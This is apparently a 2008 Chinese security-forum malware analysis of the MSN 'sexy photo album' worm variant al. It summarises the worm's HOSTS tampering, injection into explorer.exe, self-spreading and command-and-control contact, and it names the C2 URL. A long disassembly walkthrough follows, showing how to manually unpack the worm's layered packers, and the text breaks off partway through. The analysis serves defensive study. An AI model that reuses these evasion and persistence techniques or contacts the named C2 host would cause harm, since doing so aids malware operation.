[原创]蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)-经典问答-看雪-安全社区|安全招聘|kanxue.com

[原创]蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)

发表于: 2008-6-13 21:41 7036

[原创]蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)

coderui

2008-6-13 21:41

7036

////////////////////////////////////////////////////////////////////////////////////////////////////
文章名称：蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)
文章类型：病毒反汇编逆向分析
编写作者：Coderui
编写日期：2008年06月13日
作者博客：http://hi.baidu.com/coderui
////////////////////////////////////////////////////////////////////////////////////////////////////
****************************************************************************************************
----------------------------------------------------------------------------------------------------
病毒功能简述：

病毒名称：Worm/MSN.SendPhoto.al
中文名：“性感相册”变种al
病毒长度：23040 字节
病毒类型：蠕虫
危险级别：★★
影响平台：Win 9X/ME/NT/2000/XP/2003
病毒描述：
Worm/MSN.SendPhoto.al“性感相册”变种al是蠕虫家族的最新成员之一，采用高级语言编写，并经过添加多层保护壳处理。“性感相册”变种al运行后，会自我复制到被感染计算机系统的“%SystemRoot%\system32\”目录下，并重新命名为“waccs.exe”（文件属性设置为：系统、隐藏、只读）。“性感相册”变种al会在被感染计算机的后台强行篡改用户系统中的HOSTS文件，利用域名映像劫持技术禁止用户访问与安全相关的网站。“性感相册”变种al在运行时，采用进程隐藏技术使自身的进程运行后不显示，这样可以使用户很难发现该病毒的存在。“性感相册”变种al在运行时，会在被感染计算机的后台将恶意可执行代码注入到系统桌面程序“explorer.exe”进程内存的空间中，并调用执行[其中，所注入的恶意代码的功能是：1、以共享方式打开"%SystemRoot%\system32\waccs.exe"文件，防止用户删除该病毒主程序文件。2、建立互斥量“t3x0”，利用进程守护技术原理，用系统“explorer.exe”进程来保护病毒主程序进程不被关闭(循环监视病毒主程序进程是否被关闭，如果发现被关闭则重新调用运行)。]。“性感相册”变种al会在被感染计算机系统的后台利用“E-MAIL”邮件和“MSN”等聊天工具进行群发恶意广告信息，可能还会利用“E-MAIL”邮件和“MSN”等聊天工具进行自我传播。“性感相册”变种al在运行时，会在被感染计算机系统的后台不段循环与骇客指定远程服务器（其中，通信地址为：“http://www.secure.freebsd.la”）进行秘密数据通信，接收从骇客服务器返回的数据包，根据包中骇客定义好的“指令”执行相应的恶意操作。“性感相册”变种al会通过在注册表启动项中添加新键的方式，来实现开机蠕虫病毒自启动。
----------------------------------------------------------------------------------------------------
一、手动脱壳部分(三层壳：UPX + 未知壳 + 压缩壳.)：

第一层：UPX

0041D100 >  60             PUSHAD                                  ; 第一层UPX壳入口处.[F8]向下走一步.
0041D101 BE 00804100    MOV ESI,misfotos.00418000             ; 根据"ESP守恒定律",利用命令"HR ESP"下硬件断点,[F9]运行.
0041D106 8DBE 0090FEFF LEA EDI,DWORD PTR DS:[ESI+FFFE9000]
0041D10C 57             PUSH EDI
0041D10D 83CD FF       OR EBP,FFFFFFFF
0041D110 EB 10          JMP SHORT misfotos.0041D122
         .
         .
         .
0041D24B 8D4424 80    LEA EAX,DWORD PTR SS:[ESP-80]          ; 运行后停在这里.利用命令"HD"删除硬件断点.
0041D24F 6A 00          PUSH 0
0041D251 39C4          CMP ESP,EAX
0041D253  ^ 75 FA          JNZ SHORT misfotos.0041D24F
0041D255 83EC 80       SUB ESP,-80
0041D258  - E9 EB44FEFF    JMP misfotos.00401748                   ; 这里是关键跳转,[F4]运行到这里,再[F8]一次,就到了下一个壳的OEP入口.
----------------------------------------------------------------------------------------------------
第二层：未知壳

00401748 68 A0000000    PUSH 0A0                               ; 第二层未知壳入口处.[F8]向下一直走.
0040174D FF15 AA914100 CALL DWORD PTR DS:[4191AA]             ; GDI32.GetTextCharset
00401753 2315 10FE4000 AND EDX,DWORD PTR DS:[40FE10]
00401759 B8 D5D4C5E4    MOV EAX,E4C5D4D5
0040175E BA 8AF84694    MOV EDX,9446F88A
00401763 68 00000000    PUSH 0
00401768 FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
0040176E 330D F0FF4000 XOR ECX,DWORD PTR DS:[40FFF0]
00401774 2915 B0F84000 SUB DWORD PTR DS:[40F8B0],EDX
0040177A B9 FE6FDB94    MOV ECX,94DB6FFE
0040177F 60             PUSHAD
00401780 68 78000000    PUSH 78
00401785 FF15 AA914100 CALL DWORD PTR DS:[4191AA]             ; GDI32.GetTextCharset
0040178B B8 99B0188D    MOV EAX,8D18B099
00401790 23CA          AND ECX,EDX
00401792 C1D2 13       RCL EDX,13
00401795 68 5A000000    PUSH 5A
0040179A FF15 CE914100 CALL DWORD PTR DS:[4191CE]             ; GDI32.GetTextColor
004017A0 B8 F52BFF3B    MOV EAX,3BFF2BF5
004017A5 0BC1          OR EAX,ECX
004017A7 E9 0C000000    JMP misfotos.004017B8
004017AC 81DA 41B3616E SBB EDX,6E61B341
004017B2 81E1 02074014 AND ECX,14400702
004017B8 68 F0000000    PUSH 0F0
004017BD FF15 AA914100 CALL DWORD PTR DS:[4191AA]             ; GDI32.GetTextCharset
004017C3 C1C2 14       ROL EDX,14
004017C6 2BC1          SUB EAX,ECX
004017C8 1315 80FC4000 ADC EDX,DWORD PTR DS:[40FC80]
004017CE 6A 40          PUSH 40
004017D0 68 78000000    PUSH 78
004017D5 FF15 DA914100 CALL DWORD PTR DS:[4191DA]             ; GDI32.GetStockObject
004017DB 13C8          ADC ECX,EAX
004017DD B8 8EC095D3    MOV EAX,D395C08E
004017E2 E9 0A000000    JMP misfotos.004017F1
004017E7 2BC1          SUB EAX,ECX
004017E9 C1D9 13       RCR ECX,13
004017EC BA DA3D088C    MOV EDX,8C083DDA
004017F1 68 5A000000    PUSH 5A
004017F6 FF15 AA914100 CALL DWORD PTR DS:[4191AA]             ; GDI32.GetTextCharset
004017FC C1D0 17       RCL EAX,17
004017FF 1BD1          SBB EDX,ECX
00401801 E9 0B000000    JMP misfotos.00401811
00401806 B9 D9B0C767    MOV ECX,67C7B0D9
0040180B 0115 D0FF4000 ADD DWORD PTR DS:[40FFD0],EDX
00401811 68 00100000    PUSH 1000
00401816 68 82000000    PUSH 82
0040181B FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
00401821 23C1          AND EAX,ECX
00401823 81CA 3592BBAE OR EDX,AEBB9235
00401829 1905 10F94000 SBB DWORD PTR DS:[40F910],EAX
0040182F 68 46000000    PUSH 46
00401834 FF15 CE914100 CALL DWORD PTR DS:[4191CE]             ; GDI32.GetTextColor
0040183A C1F1 1C       SAL ECX,1C
0040183D B8 56BE5D76    MOV EAX,765DBE56
00401842 E9 0C000000    JMP misfotos.00401853
00401847 81D1 C57C94A5 ADC ECX,A5947CC5
0040184D 40             INC EAX
0040184E BA F96C60E2    MOV EDX,E2606CF9
00401853 68 6E000000    PUSH 6E
00401858 FF15 DA914100 CALL DWORD PTR DS:[4191DA]             ; GDI32.GetStockObject
0040185E 03C8          ADD ECX,EAX
00401860 81C2 41CE4169 ADD EDX,6941CE41
00401866 3BC8          CMP ECX,EAX
00401868 79 0F          JNS SHORT misfotos.00401879
0040186A 330D A0FF4000 XOR ECX,DWORD PTR DS:[40FFA0]
00401870 C1D8 02       RCR EAX,2
00401873 210D B0FA4000 AND DWORD PTR DS:[40FAB0],ECX
00401879 C1D8 07       RCR EAX,7
0040187C 81CA B22C5ABB OR EDX,BB5A2CB2
00401882 1BD1          SBB EDX,ECX
00401884 68 14000000    PUSH 14
00401889 FF15 CE914100 CALL DWORD PTR DS:[4191CE]             ; GDI32.GetTextColor
0040188F 310D F0F84000 XOR DWORD PTR DS:[40F8F0],ECX
00401895 81C2 610C3949 ADD EDX,49390C61
0040189B 1B05 A0FE4000 SBB EAX,DWORD PTR DS:[40FEA0]
004018A1 3BC8          CMP ECX,EAX
004018A3 76 0C          JBE SHORT misfotos.004018B1
004018A5 81E1 29B246CB AND ECX,CB46B229
004018AB 81DA C19BC3A4 SBB EDX,A4C39BC1
004018B1 C1C0 06       ROL EAX,6
004018B4 0315 A0F84000 ADD EDX,DWORD PTR DS:[40F8A0]
004018BA 2105 50F94000 AND DWORD PTR DS:[40F950],EAX
004018C0 68 E8240000    PUSH 24E8
004018C5 68 14000000    PUSH 14
004018CA FF15 DA914100 CALL DWORD PTR DS:[4191DA]             ; GDI32.GetStockObject
004018D0 3115 20FD4000 XOR DWORD PTR DS:[40FD20],EDX
004018D6 81D1 FE912D27 ADC ECX,272D91FE
004018DC 68 78000000    PUSH 78
004018E1 FF15 CE914100 CALL DWORD PTR DS:[4191CE]             ; GDI32.GetTextColor
004018E7 2B05 20F84000 SUB EAX,DWORD PTR DS:[40F820]
004018ED 0BC2          OR EAX,EDX
004018EF BA E1B9BFBE    MOV EDX,BEBFB9E1
004018F4 81FA F5118A80 CMP EDX,808A11F5
004018FA 75 11          JNZ SHORT misfotos.0040190D
004018FC B8 3EC66BBE    MOV EAX,BE6BC63E
00401901 81C9 41E9FB10 OR ECX,10FBE941
00401907 2905 B0F84000 SUB DWORD PTR DS:[40F8B0],EAX
0040190D B9 09053E33    MOV ECX,333E0509
00401912 BA A1807B32    MOV EDX,327B80A1
00401917 1B05 70FD4000 SBB EAX,DWORD PTR DS:[40FD70]
0040191D 68 28000000    PUSH 28
00401922 FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
00401928 C1C9 1E       ROR ECX,1E
0040192B 0105 D0FA4000 ADD DWORD PTR DS:[40FAD0],EAX
00401931 E9 0D000000    JMP misfotos.00401943
00401936 B9 B16624FB    MOV ECX,FB2466B1
0040193B 1915 00FD4000 SBB DWORD PTR DS:[40FD00],EDX
00401941 13D1          ADC EDX,ECX
00401943 6A 00          PUSH 0
00401945 68 F0000000    PUSH 0F0
0040194A FF15 DA914100 CALL DWORD PTR DS:[4191DA]             ; GDI32.GetStockObject
00401950 1105 90FF4000 ADC DWORD PTR DS:[40FF90],EAX
00401956 BA FAFEEA35    MOV EDX,35EAFEFA
0040195B 3BC1          CMP EAX,ECX
0040195D 79 09          JNS SHORT misfotos.00401968
0040195F 42             INC EDX
00401960 2B05 20FF4000 SUB EAX,DWORD PTR DS:[40FF20]
00401966 2BCA          SUB ECX,EDX
00401968 3305 50FC4000 XOR EAX,DWORD PTR DS:[40FC50]
0040196E B9 FEA2EB76    MOV ECX,76EBA2FE
00401973 68 64000000    PUSH 64
00401978 FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
0040197E 13C8          ADC ECX,EAX
00401980 33CA          XOR ECX,EDX
00401982 81C1 9D3A4307 ADD ECX,7433A9D
00401988 E9 0C000000    JMP misfotos.00401999
0040198D 81C2 EA541683 ADD EDX,831654EA
00401993 81D1 72147E2A ADC ECX,2A7E1472
00401999 68 3C000000    PUSH 3C
0040199E FF15 AA914100 CALL DWORD PTR DS:[4191AA]             ; GDI32.GetTextCharset
004019A4 3315 E0FA4000 XOR EDX,DWORD PTR DS:[40FAE0]
004019AA 81C1 2DF6770C ADD ECX,0C77F62D
004019B0 81E9 A1DB420D SUB ECX,0D42DBA1
004019B6 3B05 64FD4000 CMP EAX,DWORD PTR DS:[40FD64]
004019BC 7E 04          JLE SHORT misfotos.004019C2
004019BE C1F2 09       SAL EDX,9
004019C1 41             INC ECX
004019C2 1105 C0FD4000 ADC DWORD PTR DS:[40FDC0],EAX
004019C8 2315 B0FD4000 AND EDX,DWORD PTR DS:[40FDB0]
004019CE FF15 4E924100 CALL DWORD PTR DS:[41924E]             ; kernel32.VirtualAlloc
004019D4 8BF0          MOV ESI,EAX
004019D6 68 46000000    PUSH 46
004019DB FF15 DA914100 CALL DWORD PTR DS:[4191DA]             ; GDI32.GetStockObject
004019E1 81D1 E665EAFA ADC ECX,FAEA65E6
004019E7 3105 40FA4000 XOR DWORD PTR DS:[40FA40],EAX
004019ED 3BCA          CMP ECX,EDX
004019EF 79 08          JNS SHORT misfotos.004019F9
004019F1 0BD1          OR EDX,ECX
004019F3 B9 D5A0E402    MOV ECX,2E4A0D5
004019F8 40             INC EAX
004019F9 0915 F0FE4000 OR DWORD PTR DS:[40FEF0],EDX
004019FF 0BD0          OR EDX,EAX
00401A01 68 32000000    PUSH 32
00401A06 FF15 AA914100 CALL DWORD PTR DS:[4191AA]             ; GDI32.GetTextCharset
00401A0C 0BC8          OR ECX,EAX
00401A0E 0BC8          OR ECX,EAX
00401A10 3B15 40FE4000 CMP EDX,DWORD PTR DS:[40FE40]
00401A16 71 0E          JNO SHORT misfotos.00401A26
00401A18 1905 30F94000 SBB DWORD PTR DS:[40F930],EAX
00401A1E BA 9DDD9596    MOV EDX,9695DD9D
00401A23 C1E9 1E       SHR ECX,1E
00401A26 B8 3EE8BC94    MOV EAX,94BCE83E
00401A2B 81C1 861A3829 ADD ECX,29381A86
00401A31 81E9 F15DE68A SUB ECX,8AE65DF1
00401A37 56             PUSH ESI
00401A38 68 00000000    PUSH 0
00401A3D FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
00401A43 0115 90FA4000 ADD DWORD PTR DS:[40FA90],EDX
00401A49 81E1 B524DB34 AND ECX,34DB24B5
00401A4F BA 2A9C114C    MOV EDX,4C119C2A
00401A54 3B05 EAFE4000 CMP EAX,DWORD PTR DS:[40FEEA]
00401A5A 79 0F          JNS SHORT misfotos.00401A6B
00401A5C C1D1 1C       RCL ECX,1C
00401A5F 81C9 B1DCFAD0 OR ECX,D0FADCB1
00401A65 81D2 D2D09685 ADC EDX,8596D0D2
00401A6B C1E8 16       SHR EAX,16
00401A6E 1BCA          SBB ECX,EDX
00401A70 68 00000000    PUSH 0
00401A75 68 FA000000    PUSH 0FA
00401A7A FF15 A2914100 CALL DWORD PTR DS:[4191A2]             ; GDI32.GetMetaRgn
00401A80 81CA 16FA2657 OR EDX,5726FA16
00401A86 0905 E0FF4000 OR DWORD PTR DS:[40FFE0],EAX
00401A8C 3B15 EAFE4000 CMP EDX,DWORD PTR DS:[40FEEA]
00401A92 76 0B          JBE SHORT misfotos.00401A9F
00401A94 B9 395EFC83    MOV ECX,83FC5E39
00401A99 0B15 D0F94000 OR EDX,DWORD PTR DS:[40F9D0]
00401A9F 81C1 65825161 ADD ECX,61518265
00401AA5 C1E0 07       SHL EAX,7
00401AA8 C1EA 0B       SHR EDX,0B
00401AAB 68 64000000    PUSH 64
00401AB0 FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
00401AB6 B8 F918B92E    MOV EAX,2EB918F9
00401ABB 1BC2          SBB EAX,EDX
00401ABD E9 0B000000    JMP misfotos.00401ACD
00401AC2 B9 869B3EB7    MOV ECX,B73E9B86
00401AC7 1B05 F0FE4000 SBB EAX,DWORD PTR DS:[40FEF0]
00401ACD BB 60124000    MOV EBX,misfotos.00401260
00401AD2 68 96000000    PUSH 96
00401AD7 FF15 DA914100 CALL DWORD PTR DS:[4191DA]             ; GDI32.GetStockObject
00401ADD C1EA 05       SHR EDX,5
00401AE0 290D C0FD4000 SUB DWORD PTR DS:[40FDC0],ECX
00401AE6 3BD1          CMP EDX,ECX
00401AE8 7E 08          JLE SHORT misfotos.00401AF2
00401AEA BA C66B979C    MOV EDX,9C976BC6
00401AEF C1C1 11       ROL ECX,11
00401AF2 03CA          ADD ECX,EDX
00401AF4 3315 10FB4000 XOR EDX,DWORD PTR DS:[40FB10]
00401AFA 2BD1          SUB EDX,ECX
00401AFC 68 6E000000    PUSH 6E
00401B01 FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
00401B07 0305 20FE4000 ADD EAX,DWORD PTR DS:[40FE20]
00401B0D B9 A5000ABB    MOV ECX,BB0A00A5
00401B12 03C2          ADD EAX,EDX
00401B14 68 14000000    PUSH 14
00401B19 FF15 DA914100 CALL DWORD PTR DS:[4191DA]             ; GDI32.GetStockObject
00401B1F 3315 90FC4000 XOR EDX,DWORD PTR DS:[40FC90]
00401B25 23D1          AND EDX,ECX
00401B27 68 A0000000    PUSH 0A0
00401B2C FF15 CE914100 CALL DWORD PTR DS:[4191CE]             ; GDI32.GetTextColor
00401B32 B9 AAD1A3A8    MOV ECX,A8A3D1AA
00401B37 40             INC EAX
00401B38 81FA 3A9082CD CMP EDX,CD82903A
00401B3E 7A 07          JPE SHORT misfotos.00401B47
00401B40 0BD1          OR EDX,ECX
00401B42 B8 524E36FD    MOV EAX,FD364E52
00401B47 B9 5A47DD0D    MOV ECX,0DDD475A
00401B4C C1D2 10       RCL EDX,10
00401B4F FF33          PUSH DWORD PTR DS:[EBX]
00401B51 68 3C000000    PUSH 3C
00401B56 FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
00401B5C 2B0D D0FF4000 SUB ECX,DWORD PTR DS:[40FFD0]
00401B62 81CA 02BDDE9F OR EDX,9FDEBD02
00401B68 81F9 2D7FA92C CMP ECX,2CA97F2D
00401B6E 7D 0A          JGE SHORT misfotos.00401B7A
00401B70 C1C2 1D       ROL EDX,1D
00401B73 23D0          AND EDX,EAX
00401B75 B8 B6B34935    MOV EAX,3549B3B6
00401B7A 03D1          ADD EDX,ECX
00401B7C B9 C66C3771    MOV ECX,71376CC6
00401B81 68 B4000000    PUSH 0B4
00401B86 FF15 CE914100 CALL DWORD PTR DS:[4191CE]             ; GDI32.GetTextColor
00401B8C 81C9 4AE9DD0F OR ECX,0FDDE94A
00401B92 23C2          AND EAX,EDX
00401B94 C1E2 18       SHL EDX,18
00401B97 8F06          POP DWORD PTR DS:[ESI]
00401B99 68 F0000000    PUSH 0F0
00401B9E FF15 DA914100 CALL DWORD PTR DS:[4191DA]             ; GDI32.GetStockObject
00401BA4 81D2 A513B20F ADC EDX,0FB213A5
00401BAA 81EA D9325608 SUB EDX,85632D9
00401BB0 3B0D 58FA4000 CMP ECX,DWORD PTR DS:[40FA58]
00401BB6 71 0E          JNO SHORT misfotos.00401BC6
00401BB8 1105 00FC4000 ADC DWORD PTR DS:[40FC00],EAX
00401BBE 2B0D E0F84000 SUB ECX,DWORD PTR DS:[40F8E0]
00401BC4 13C2          ADC EAX,EDX
00401BC6 2B15 C0FE4000 SUB EDX,DWORD PTR DS:[40FEC0]
00401BCC B9 46AD58D4    MOV ECX,D458AD46
00401BD1 68 3C000000    PUSH 3C
00401BD6 FF15 AA914100 CALL DWORD PTR DS:[4191AA]             ; GDI32.GetTextCharset
00401BDC 81D2 560493C0 ADC EDX,C0930456
00401BE2 2B05 50FC4000 SUB EAX,DWORD PTR DS:[40FC50]
00401BE8 B9 66C9A1A9    MOV ECX,A9A1C966
00401BED 8136 838221BB XOR DWORD PTR DS:[ESI],BB218283
00401BF3 68 F0000000    PUSH 0F0
00401BF8 FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
00401BFE C1C0 0A       ROL EAX,0A
00401C01 1915 00FC4000 SBB DWORD PTR DS:[40FC00],EDX
00401C07 1BC8          SBB ECX,EAX
00401C09 81FA F18ED7B1 CMP EDX,B1D78EF1
00401C0F 71 0D          JNO SHORT misfotos.00401C1E
00401C11 13D0          ADC EDX,EAX
00401C13 B8 9AB6D2C1    MOV EAX,C1D2B69A
00401C18 81D9 22BB5FB5 SBB ECX,B55FBB22
00401C1E C1C8 11       ROR EAX,11
00401C21 03D1          ADD EDX,ECX
00401C23 68 8C000000    PUSH 8C
00401C28 FF15 AA914100 CALL DWORD PTR DS:[4191AA]             ; GDI32.GetTextCharset
00401C2E 0B05 00FE4000 OR EAX,DWORD PTR DS:[40FE00]
00401C34 81D9 C9CE2159 SBB ECX,5921CEC9
00401C3A 68 5A000000    PUSH 5A
00401C3F FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
00401C45 2BC2          SUB EAX,EDX
00401C47 1B0D 60FB4000 SBB ECX,DWORD PTR DS:[40FB60]
00401C4D E9 0F000000    JMP misfotos.00401C61
00401C52 1B05 30FB4000 SBB EAX,DWORD PTR DS:[40FB30]
00401C58 C1C2 04       ROL EDX,4
00401C5B 81C1 1206B1A2 ADD ECX,A2B10612
00401C61 8106 410E9B09 ADD DWORD PTR DS:[ESI],99B0E41
00401C67 68 14000000    PUSH 14
00401C6C 68 E6000000    PUSH 0E6
00401C71 FF15 A2914100 CALL DWORD PTR DS:[4191A2]             ; GDI32.GetMetaRgn
00401C77 81DA D197286B SBB EDX,6B2897D1
00401C7D 81C1 E9767E1F ADD ECX,1F7E76E9
00401C83 E9 0B000000    JMP misfotos.00401C93
00401C88 B8 3A429A7D    MOV EAX,7D9A423A
00401C8D 1315 20FD4000 ADC EDX,DWORD PTR DS:[40FD20]
00401C93 68 C8000000    PUSH 0C8
00401C98 FF15 DA914100 CALL DWORD PTR DS:[4191DA]             ; GDI32.GetStockObject
00401C9E C1D8 05       RCR EAX,5
00401CA1 BA 5A7944FA    MOV EDX,FA44795A
00401CA6 3B0D 26FF4000 CMP ECX,DWORD PTR DS:[40FF26]
00401CAC 72 09          JB SHORT misfotos.00401CB7
00401CAE C1DA 02       RCR EDX,2
00401CB1 210D 70FA4000 AND DWORD PTR DS:[40FA70],ECX
00401CB7 1BD0          SBB EDX,EAX
00401CB9 B9 5E1AF8E0    MOV ECX,E0F81A5E
00401CBE 68 A0000000    PUSH 0A0
00401CC3 FF15 CE914100 CALL DWORD PTR DS:[4191CE]             ; GDI32.GetTextColor
00401CC9 81DA B9742043 SBB EDX,432074B9
00401CCF C1E1 06       SHL ECX,6
00401CD2 E9 0B000000    JMP misfotos.00401CE2
00401CD7 81D1 0122DAA3 ADC ECX,A3DA2201
00401CDD BA 8E48FDE4    MOV EDX,E4FD488E
00401CE2 81C3 1151EC60 ADD EBX,60EC5111
00401CE8 68 D2000000    PUSH 0D2
00401CED FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
00401CF3 C1E9 13       SHR ECX,13
00401CF6 81EA DA05CDAB SUB EDX,ABCD05DA
00401CFC E9 0D000000    JMP misfotos.00401D0E
00401D01 B9 75BDE543    MOV ECX,43E5BD75
00401D06 BA 4D8AE267    MOV EDX,67E28A4D
00401D0B C1C8 03       ROR EAX,3
00401D0E 68 FA000000    PUSH 0FA
00401D13 68 C8000000    PUSH 0C8
00401D18 FF15 A2914100 CALL DWORD PTR DS:[4191A2]             ; GDI32.GetMetaRgn
00401D1E BA 167E846E    MOV EDX,6E847E16
00401D23 C1C8 03       ROR EAX,3
00401D26 3B15 74FC4000 CMP EDX,DWORD PTR DS:[40FC74]
00401D2C 76 0C          JBE SHORT misfotos.00401D3A
00401D2E 1905 C0FE4000 SBB DWORD PTR DS:[40FEC0],EAX
00401D34 1B15 E0F84000 SBB EDX,DWORD PTR DS:[40F8E0]
00401D3A B8 E9C146FE    MOV EAX,FE46C1E9
00401D3F 1B15 B0F84000 SBB EDX,DWORD PTR DS:[40F8B0]
00401D45 1B05 50FB4000 SBB EAX,DWORD PTR DS:[40FB50]
00401D4B 81C3 F3AE139F ADD EBX,9F13AEF3
00401D51 68 28000000    PUSH 28
00401D56 FF15 AA914100 CALL DWORD PTR DS:[4191AA]             ; GDI32.GetTextCharset
00401D5C C1D9 0B       RCR ECX,0B
00401D5F 81C1 F9C4B1D6 ADD ECX,D6B1C4F9
00401D65 1915 80FD4000 SBB DWORD PTR DS:[40FD80],EDX
00401D6B 68 A0000000    PUSH 0A0
00401D70 FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
00401D76 23D1          AND EDX,ECX
00401D78 0305 20FC4000 ADD EAX,DWORD PTR DS:[40FC20]
00401D7E C1DA 13       RCR EDX,13
00401D81 3B0D 6CFF4000 CMP ECX,DWORD PTR DS:[40FF6C]
00401D87 71 0E          JNO SHORT misfotos.00401D97
00401D89 C1D2 1A       RCL EDX,1A
00401D8C 81E2 8DCC5475 AND EDX,7554CC8D
00401D92 B8 BAC7C622    MOV EAX,22C6C7BA
00401D97 C1FA 12       SAR EDX,12
00401D9A C1C1 08       ROL ECX,8
00401D9D 81C6 6AED2E2F ADD ESI,2F2EED6A
00401DA3 68 E6000000    PUSH 0E6
00401DA8 FF15 DA914100 CALL DWORD PTR DS:[4191DA]             ; GDI32.GetStockObject
00401DAE 1B05 50F94000 SBB EAX,DWORD PTR DS:[40F950]
00401DB4 B9 6AA78799    MOV ECX,9987A76A
00401DB9 81FA F23E3F93 CMP EDX,933F3EF2
00401DBF 72 07          JB SHORT misfotos.00401DC8
00401DC1 23D0          AND EDX,EAX
00401DC3 B9 16DFEE35    MOV ECX,35EEDF16
00401DC8 81C1 12580249 ADD ECX,49025812
00401DCE 13C2          ADC EAX,EDX
00401DD0 68 C8000000    PUSH 0C8
00401DD5 68 0A000000    PUSH 0A
00401DDA FF15 A2914100 CALL DWORD PTR DS:[4191A2]             ; GDI32.GetMetaRgn
00401DE0 81D2 46B0111A ADC EDX,1A11B046
00401DE6 B9 3DCFF281    MOV ECX,81F2CF3D
00401DEB B8 950F5EFE    MOV EAX,FE5E0F95
00401DF0 81FA CA307D84 CMP EDX,847D30CA
00401DF6 7A 08          JPE SHORT misfotos.00401E00
00401DF8 1105 00FC4000 ADC DWORD PTR DS:[40FC00],EAX
00401DFE 1BC2          SBB EAX,EDX
00401E00 1BD1          SBB EDX,ECX
00401E02 C1F9 18       SAR ECX,18
00401E05 68 3C000000    PUSH 3C
00401E0A FF15 DA914100 CALL DWORD PTR DS:[4191DA]             ; GDI32.GetStockObject
00401E10 0BC8          OR ECX,EAX
00401E12 1BD0          SBB EDX,EAX
00401E14 0305 80FA4000 ADD EAX,DWORD PTR DS:[40FA80]
00401E1A 81C6 9A12D1D0 ADD ESI,D0D1129A
00401E20 81FB 48174000 CMP EBX,misfotos.00401748
00401E26  ^ 0F85 A6FCFFFF JNZ misfotos.00401AD2                   ; 这里的向上回跳不要跳,我们直接执行到下一行的代码处,因为这里是循环.
00401E2C 68 50000000    PUSH 50                               ; [F4]运行到这里,继续[F8]向下一直走.
00401E31 68 8C000000    PUSH 8C
00401E36 FF15 A2914100 CALL DWORD PTR DS:[4191A2]             ; GDI32.GetMetaRgn
00401E3C 13D1          ADC EDX,ECX
00401E3E C1C8 1B       ROR EAX,1B
00401E41 BA B13EEE10    MOV EDX,10EE3EB1
00401E46 81F9 9E40C622 CMP ECX,22C6409E
00401E4C 7E 0B          JLE SHORT misfotos.00401E59
00401E4E 3305 50FB4000 XOR EAX,DWORD PTR DS:[40FB50]
00401E54 B9 79450E10    MOV ECX,100E4579
00401E59 3305 50FB4000 XOR EAX,DWORD PTR DS:[40FB50]
00401E5F B9 C18E4B4F    MOV ECX,4F4B8EC1
00401E64 23D0          AND EDX,EAX
00401E66 68 14000000    PUSH 14
00401E6B FF15 DA914100 CALL DWORD PTR DS:[4191DA]             ; GDI32.GetStockObject
00401E71 0905 60FF4000 OR DWORD PTR DS:[40FF60],EAX
00401E77 03C1          ADD EAX,ECX
00401E79 E9 0C000000    JMP misfotos.00401E8A
00401E7E C1E1 08       SHL ECX,8
00401E81 0B05 90FB4000 OR EAX,DWORD PTR DS:[40FB90]
00401E87 C1CA 0C       ROR EDX,0C
00401E8A 68 BE000000    PUSH 0BE
00401E8F FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
00401E95 C1E1 1A       SHL ECX,1A
00401E98 BA 66CD8033    MOV EDX,3380CD66
00401E9D 5B             POP EBX
00401E9E 68 F0000000    PUSH 0F0
00401EA3 FF15 CE914100 CALL DWORD PTR DS:[4191CE]             ; GDI32.GetTextColor
00401EA9 48             DEC EAX
00401EAA BA A97A171B    MOV EDX,1B177AA9
00401EAF 81EA FD9A1BC0 SUB EDX,C01B9AFD
00401EB5 81F9 02AAC65E CMP ECX,5EC6AA02
00401EBB 72 08          JB SHORT misfotos.00401EC5
00401EBD C1F0 11       SAL EAX,11
00401EC0 B9 853F21A6    MOV ECX,A6213F85
00401EC5 C1F0 02       SAL EAX,2
00401EC8 BA B5C941E2    MOV EDX,E241C9B5
00401ECD 03D1          ADD EDX,ECX
00401ECF 68 AA000000    PUSH 0AA
00401ED4 68 BE000000    PUSH 0BE
00401ED9 FF15 A2914100 CALL DWORD PTR DS:[4191A2]             ; GDI32.GetMetaRgn
00401EDF 81C1 428C77DA ADD ECX,DA778C42
00401EE5 2915 20FD4000 SUB DWORD PTR DS:[40FD20],EDX
00401EEB FFD3          CALL EBX                               ; 到这里后千万不要按[F8]去步过执行,那么会跑飞的.应该按[F7]进去,里边是下一个壳的OEP入口.
00401EED 68 3C000000    PUSH 3C
00401EF2 FF15 F2914100 CALL DWORD PTR DS:[4191F2]             ; GDI32.GetObjectType
00401EF8 03C1          ADD EAX,ECX
00401EFA C1C2 13       ROL EDX,13
00401EFD C1E8 18       SHR EAX,18
00401F00 E9 10000000    JMP misfotos.00401F15
00401F05 1315 A0FB4000 ADC EDX,DWORD PTR DS:[40FBA0]
00401F0B B9 824E7AB1    MOV ECX,B17A4E82
00401F10 B8 8AA4C975    MOV EAX,75C9A48A
00401F15 68 82000000    PUSH 82
00401F1A FF15 CE914100 CALL DWORD PTR DS:[4191CE]             ; GDI32.GetTextColor
00401F20 190D 20FC4000 SBB DWORD PTR DS:[40FC20],ECX
00401F26 C1EA 0B       SHR EDX,0B
00401F29 130D C0FD4000 ADC ECX,DWORD PTR DS:[40FDC0]
00401F2F E9 10000000    JMP misfotos.00401F44
00401F34 B8 6587CF97    MOV EAX,97CF8765
00401F39 81C1 0E541C99 ADD ECX,991C540E
00401F3F B8 957536C9    MOV EAX,C9367595
00401F44 61             POPAD
00401F45 68 64000000    PUSH 64
